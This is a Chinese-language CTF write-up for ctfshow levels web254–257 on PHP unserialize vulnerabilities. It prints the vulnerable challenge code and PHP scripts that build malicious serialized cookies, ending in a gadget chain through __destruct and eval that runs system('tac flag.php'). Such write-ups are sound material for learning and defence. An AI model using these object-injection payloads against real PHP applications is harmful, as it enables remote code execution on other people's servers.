CTFSHOW代码审计模块wp

发布于:2024-03-31 ⋅ 阅读:(81) ⋅ 点赞:(0)

web254

username=xxxxxx&password=xxxxxx

web255

<?php
/**
 * Builds the serialized form of a ctfShowUser whose isVip flag is true.
 * The class name and the property name must match the target exactly:
 * unserialize() matches them byte for byte.
 */
class ctfShowUser{
    public $isVip = true;
}

$serialized = serialize(new ctfShowUser());
var_dump($serialized);
?>
运行结果:
string(39) "O:11:"ctfShowUser":1:{s:5:"isVip";b:1;}"
抓包添加信息
/?username=xxxxxx&password=xxxxxx
cookie:user=O:11:"ctfShowUser":1:{s:5:"isVip"%3bb:1%3b}

web256

<?php
/**
 * Builds the serialized form of a ctfShowUser carrying both the isVip flag
 * and a username. Public properties serialize under their bare names, so no
 * URL encoding of NUL bytes is needed for this variant.
 */
class ctfShowUser{
    public $isVip = true;
    public $username = 'anything';
}

$serialized = serialize(new ctfShowUser());
var_dump($serialized);
?>
运行结果为:
string(69) "O:11:"ctfShowUser":2:{s:5:"isVip";b:1;s:8:"username";s:8:"anything";}"
URL 编码前的序列化结果以及编码后的结果如下:
O:11:"ctfShowUser":2:{s:5:"isVip";b:1;s:8:"username";s:8:"anything";}
O%3A11%3A%22ctfShowUser%22%3A2%3A%7Bs%3A5%3A%22isVip%22%3Bb%3A1%3Bs%3A8%3A%22username%22%3Bs%3A8%3A%22anything%22%3B%7D
GET 方式传参:
?username=anything&password=xxxxxx

web257

/**
 * Account object used by the challenge. Its private properties serialize with
 * a "\0ctfShowUser\0" prefix, which is why the writeup urlencode()s the payload.
 */
class ctfShowUser{
    /** Only compared in login(); a serialized payload does not need them. */
    private $username = 'xxxxxx';
    private $password = 'xxxxxx';
    private $isVip = false;

    /** Read by __destruct(); an object rebuilt by unserialize() holds whatever value the data carried. */
    private $class = 'info';

    /** Runs on `new` only — unserialize() does not call it, so it places no constraint on $class. */
    public function __construct(){
        $this->class = new info();
    }

    /** Strict comparison of both credentials. Methods themselves are never part of serialized data. */
    public function login($u,$p){
        $userMatches = ($this->username === $u);
        $passMatches = ($this->password === $p);
        return $userMatches && $passMatches;
    }

    /**
     * Runs automatically when the object is released. This call is what reaches
     * getInfo() on whatever object $class holds, so it is the trigger, not a
     * detail that can be ignored.
     */
    public function __destruct(){
        $target = $this->class;
        $target->getInfo();
    }
}
#构造 payload 时用不到,可以删去
/** Benign default target of ctfShowUser::__destruct(); it just returns the stored user name. */
class info{
    private $user = 'xxxxxx';

    public function getInfo(){
        $stored = $this->user;
        return $stored;
    }
}
#利用到的类
/** Gadget class from the challenge; its single property is what reaches eval(). */
class backDoor{
    /** Whatever string the serialized data placed here. */
    private $code;

    /**
     * Evaluates $code as PHP. SECURITY: when this object is produced by
     * unserialize() on client-controlled input (the cookie), this is arbitrary
     * code execution — the sink the challenge is built around. Nothing is
     * returned; the result of eval() is discarded.
     */
    public function getInfo(){
        $source = $this->code;
        eval($source);
    }
}

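// Read both credentials with `??` so a missing parameter yields null without an
// "Undefined array key" warning; the isset() check below then rejects it. The
// original read the index first and only checked isset() afterwards, so the
// check never guarded the read.
$username = $_GET['username'] ?? null;
$password = $_GET['password'] ?? null;

if (isset($username, $password)) {
    // SECURITY: unserialize() on a client-supplied cookie lets the caller choose
    // the class and every property value of $user, which then drive login() and
    // the object's __destruct(). Deserialising untrusted input this way is the
    // vulnerability this challenge is about; real code should use json_decode()
    // or at least pass ['allowed_classes' => [...]] to unserialize().
    $user = unserialize($_COOKIE['user']);
    $user->login($username, $password);
}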
#最终代码如下。对序列化结果再做一次 urlencode,是因为 private 属性名序列化后带有 \0(NUL)字节,
#直接复制会丢失这个字节,URL 编码成 %00 后才能完整地放进 cookie
<?php
/**
 * Payload generator for web257: a ctfShowUser whose private $class already
 * holds a backDoor, so the target's __destruct() reaches backDoor::getInfo().
 * urlencode() is applied because private property names serialize with a
 * leading \0 byte that would be lost when the string is copied into a cookie.
 */
class ctfShowUser{
    private $class;

    public function __construct(){
        $this->class = new backDoor();
    }
}

class backDoor{
    /** The string the target's eval() receives (reproduced from the challenge listing). */
    private $code = 'system("tac flag.php");';
}

$payload = urlencode(serialize(new ctfShowUser()));
var_dump($payload);
?>

运行结果如下:

string(201) "O%3A11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A18%3A%22%00ctfShowUser%00class%22%3BO%3A8%3A%22backDoor%22%3A1%3A%7Bs%3A14%3A%22%00backDoor%00code%22%3Bs%3A23%3A%22system%28%22tac+flag.php%22%29%3B%22%3B%7D%7D"
